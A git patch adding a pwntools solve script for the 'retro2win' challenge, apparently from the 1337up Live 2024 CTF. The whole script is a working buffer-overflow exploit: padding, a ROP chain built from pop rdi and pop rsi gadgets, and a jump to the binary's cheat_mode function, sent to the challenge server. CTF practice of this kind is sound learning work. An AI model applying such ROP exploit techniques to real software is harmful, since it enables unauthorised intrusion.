From 5f56f5e7e3b8b537a8371fe6a8cb52751ba7f03d Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Wed, 27 Nov 2024 22:22:33 +0300
Subject: [PATCH] solve script

---
 1337up_live_2024/retro2win/a.py | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 1337up_live_2024/retro2win/a.py

diff --git a/1337up_live_2024/retro2win/a.py b/1337up_live_2024/retro2win/a.py
new file mode 100644
index 0000000..760a578
--- /dev/null
+++ b/1337up_live_2024/retro2win/a.py
@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./retro2win", checksec=False)
+# r = process()
+r = remote("retro2win.ctf.intigriti.io", 1338)
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# gadgets
+pop_rdi = 0x4009b3
+pop_rsi_r15 = 0x4009b1
+
+# leak
+s(b"1337")
+buf = b"A"*24
+buf += p64(pop_rdi)
+buf += p64(0x2323232323232323)
+buf += p64(pop_rsi_r15)
+buf += p64(0x4242424242424242)
+buf += p64(0)
+buf += p64(target.sym.cheat_mode)
+s(buf)
+
+r.interactive()
\ No newline at end of file